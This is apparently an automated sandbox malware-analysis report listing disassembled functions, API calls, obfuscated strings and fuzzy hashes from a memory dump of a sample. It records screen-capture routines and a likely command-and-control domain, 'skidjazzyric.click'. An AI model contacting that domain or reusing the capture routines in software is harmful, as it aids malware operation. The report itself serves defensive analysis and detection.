Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
String ID: Y
API String ID: 1298755333-3233089245
Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B

Function 00425100 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 480COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243

Strings

C`<f, xrefs: 004253D3
+$e, xrefs: 0042517A, 00425165
%\)R, xrefs: 004253AB
XY, xrefs: 00425146
+$e, xrefs: 004251F2
.T'j, xrefs: 004253BB
?P:V, xrefs: 004253B3
]RB, xrefs: 00425257
:@&F, xrefs: 00425393
1D6Z, xrefs: 0042539B
,X*^, xrefs: 004253A3

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
API String ID: 237503144-2846770461
Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46

Function 00425D6A Relevance: 17.0, Strings: 13, Instructions: 778COMMON

Download Yara Rule

Strings

8I>K, xrefs: 00426858
Cq, xrefs: 00426956
$@7F, xrefs: 0042633C
-T,j, xrefs: 0042636E
+\1R, xrefs: 0042635A
4D2Z, xrefs: 00426346
(X#^, xrefs: 00426350
T`Sf, xrefs: 0042638C
qs, xrefs: 00425E96
uVw, xrefs: 00425EA0
2E1G, xrefs: 00426876
&$, xrefs: 004266A0
Wdz, xrefs: 00426396

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq$$@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-3425147335
Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84

Function 00419840 Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419CE7
FreeLibrary.KERNEL32(?), ref: 00419D24

Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Strings

Cq, xrefs: 00419864, 00419946, 0041999D, 00419A51, 00419C63, 00419C95, 00419CFF, 00419D38, 00419DB4, 00419E93, 00419F54, 00419FB0, 0041A09C, 0041A135, 0041A1DB, 0041A332, 0041A3B2
~|, xrefs: 00419B2E
vt, xrefs: 00419AFC
tj, xrefs: 00419BBA
pv, xrefs: 00419BB2
if, xrefs: 00419B1C
SP, xrefs: 00419BF2

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: Cq$ ~|$SP$if$pv$tj$vt
API String ID: 764372645-2190577451
Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A

Function 020E9AA7 Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 020E9F4E
FreeLibrary.KERNEL32(?), ref: 020E9F8B

Strings

~|, xrefs: 020E9D95
Cq, xrefs: 020E9ACB, 020E9BAD, 020E9C04, 020E9CB8, 020E9ECA, 020E9EFC, 020E9F66, 020E9F9F, 020EA01B, 020EA0FA, 020EA1BB, 020EA217, 020EA303, 020EA39C, 020EA442, 020EA599, 020EA619
vt, xrefs: 020E9D63
pv, xrefs: 020E9E19
if, xrefs: 020E9D83
tj, xrefs: 020E9E21
SP, xrefs: 020E9E59

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: Cq$ ~|$SP$if$pv$tj$vt
API String ID: 3664257935-2190577451
Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction ID: c54cbda64c2d1a63102a054cad0f20b83847a97678cd32b0779c6eb797f4b9b4
Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction Fuzzy Hash: 2F621770709350AFEB65CB14CC8172FB7E2FFC9318F18862CE496972A1D371A8859B56

Function 00417405 Relevance: 15.1, APIs: 4, Strings: 4, Instructions: 1110COMMON

Download Yara Rule

Strings

O, xrefs: 00417625
~, xrefs: 00418158
5&'d, xrefs: 004175E5
Cq, xrefs: 00417586, 0041778D, 00417803

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq$5&'d$O$~
API String ID: 0-4013991365
Opcode ID: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
Opcode Fuzzy Hash: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A

Function 004257E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D

Strings

B"@, xrefs: 00425818
rp, xrefs: 00425834
=^"\, xrefs: 00425ABF
`J/H, xrefs: 00425826
)RSP, xrefs: 004259A1

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$)RSP$=^"\$`J/H$rp
API String ID: 237503144-816972838
Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94

Function 0040D545 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

CoUninitialize.OLE32 ref: 0040D555

Strings

9Y, xrefs: 0040D854
?C*], xrefs: 0040D7A4
|qay, xrefs: 0040D641
skidjazzyric.click, xrefs: 0040D90A
&W-Q, xrefs: 0040D7B9
~wxH, xrefs: 0040D64F

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
API String ID: 3213364925-1525209810
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95

Function 020DD7AC Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 02106BE7: GetDC.USER32(00000000), ref: 02106BF0
Part of subcall function 02106BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02106C11
Part of subcall function 02106BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02106C21
Part of subcall function 02106BE7: DeleteObject.GDI32(00000000), ref: 02106C28
Part of subcall function 02106BE7: CreateCompatibleDC.GDI32(00000000), ref: 02106C37
Part of subcall function 02106BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02106C42
Part of subcall function 02106BE7: SelectObject.GDI32(00000000,00000000), ref: 02106C4E
Part of subcall function 02106BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02106C71

CoUninitialize.COMBASE ref: 020DD7BC

Strings

&W-Q, xrefs: 020DDA20
|qay, xrefs: 020DD8A8
skidjazzyric.click, xrefs: 020DDB71
?C*], xrefs: 020DDA0B
9Y, xrefs: 020DDABB
~wxH, xrefs: 020DD8B6

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
API String ID: 3248263802-1525209810
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: 9d23ca1e8950bfaa469f6c1f17216c661848e2dfb026eec94f0669a24c170f32
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: D0B137766057818BE326CF2AC4D0762FBE2FF96304B18C1ACD4C24BB4AC739A402DB51

Function 0041C400 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

*H%N, xrefs: 0041C8EF
C`6f, xrefs: 0041C919
,X0^, xrefs: 0041C90B
C`6f, xrefs: 0041C73C, 0041CBB1, 0041CC7D
,\/b, xrefs: 0041C912
4D"J, xrefs: 0041C8E8
+P%V, xrefs: 0041C8FD
2T'Z, xrefs: 0041C904

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5

Function 020EC667 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

,\/b, xrefs: 020ECB79
4D"J, xrefs: 020ECB4F
*H%N, xrefs: 020ECB56
+P%V, xrefs: 020ECB64
2T'Z, xrefs: 020ECB6B
C`6f, xrefs: 020ECB80
,X0^, xrefs: 020ECB72
C`6f, xrefs: 020EC9A3, 020ECE18, 020ECEE4

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction ID: b223773d42aa3325294d9e48bb8c38b83fab4909d0514473cd21a390a6f65619
Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction Fuzzy Hash: EC3239B19003118BDF25CF24C8927B6B7B2FF95318F28829DD8525F794E7769842CB91

Function 020D8AE7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 020D8B0B
GetCurrentThreadId.KERNEL32 ref: 020D8B15
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020D8BBC
GetForegroundWindow.USER32 ref: 020D8BD1
ExitProcess.KERNEL32 ref: 020D8D1E

Strings

6W01, xrefs: 020D8C1C

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction ID: b75ffc4bf8d924883ac438562b3551fdf2af4ad6a5725c60865510072bb8b1b3
Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction Fuzzy Hash: 9C519C73A453040FD728AF648C8A356BAC79FC1310F1FC1399989AB3E5EA78880697C5

Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518COMMON

Download Yara Rule

Strings

?_oY, xrefs: 0040B389
K{Du, xrefs: 0040B3DA
fWpQ, xrefs: 0040B397
`/(), xrefs: 0040B588
6C(], xrefs: 0040B382
Bc*}, xrefs: 0040B3C6
@w@q, xrefs: 0040B3E4

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
API String ID: 0-74227037
Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

Function 00425AF0 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

B:, xrefs: 00425C36
=^"\, xrefs: 00425ABF
K3, xrefs: 00425C4A
)RSP, xrefs: 004259A1
bX_^, xrefs: 00425BBD
C@, xrefs: 00425C40

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: )RSP$=^"\$B:$C@$K3$bX_^
API String ID: 0-3030200349
Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91

Function 0042EA62 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68
4b, xrefs: 0042EDDA
0, xrefs: 0042ED00

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A

Function 020FECC9 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

8<j?, xrefs: 020FEFB7
4b, xrefs: 020FF041
0, xrefs: 020FEF67
D, xrefs: 020FEFCF

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: f43a7dfab18d0eca509f5685d3c556ae88b976862c97c52ab7e49f180bed803a
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 1C91276024C3828BD359CF39C8A137AFBD2AFD6218F18896DE1D6CB691D378C409D716

Function 0041BBA0 Relevance: 5.3, Strings: 4, Instructions: 325COMMON

Download Yara Rule

Strings

'P0V, xrefs: 0041BD31
WT, xrefs: 0041BD39
,D,J, xrefs: 0041BD19
9HiN, xrefs: 0041BD21

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86

Function 00442D20 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

bX_^, xrefs: 00442D22
NMNO, xrefs: 00442E20
Cq, xrefs: 00442E66, 00442F3A
D`a&, xrefs: 00442ED5

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: InitializeThunk
String ID: Cq$D`a&$NMNO$bX_^
API String ID: 2994545307-2994411917
Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759

Function 020EBE2C Relevance: 5.2, Strings: 4, Instructions: 223COMMON

Download Yara Rule

Strings

'P0V, xrefs: 020EBF98
WT, xrefs: 020EBFA0
,D,J, xrefs: 020EBF80
9HiN, xrefs: 020EBF88

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
Instruction ID: e56f7098ef573cb9b2597a72211336c59ebf5077488a308bf587d98ffb368292
Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
Instruction Fuzzy Hash: B071CFB654D3958BD704DF12C8802AFBBE2FBD1318F188E6CE1D95B251C739854A8F86

Function 020F5D57 Relevance: 5.1, Strings: 4, Instructions: 132COMMON

Download Yara Rule

Strings

K3, xrefs: 020F5EB1
bX_^, xrefs: 020F5E24
B:, xrefs: 020F5E9D
C@, xrefs: 020F5EA7

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: B:$C@$K3$bX_^
API String ID: 0-595269213
Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
Instruction ID: 57ee608eba2fb6d3755f5640f33234475b8e82ba361bcc10fd10421b92553cdd
Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
Instruction Fuzzy Hash: 1C41CEB5D113289BDB20DF79CD827DDBFB1AB85300F4442AAE448A7294D7340E4A8FD2

Function 00414C20 Relevance: 4.7, Strings: 3, Instructions: 989COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00415070
Cq, xrefs: 0041505F, 004150F8, 00415195, 00415237, 004152CF, 00415330, 00415390, 004153F1, 004156A6
UA, xrefs: 004155D4

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq$NP,?$UA
API String ID: 0-4023969221
Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789

Function 0042B170 Relevance: 4.2, Strings: 3, Instructions: 428COMMON

Download Yara Rule

Strings

{wBy, xrefs: 0042B538
Cq, xrefs: 0042B4A6, 0042B6D6
?;;, xrefs: 0042B3AA

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq${wBy$?;;
API String ID: 0-2543278418
Opcode ID: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
Opcode Fuzzy Hash: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A

Function 0042EB5F Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68
4b, xrefs: 0042EDDA

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A

Function 0042EBB3 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68
4b, xrefs: 0042EDDA

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
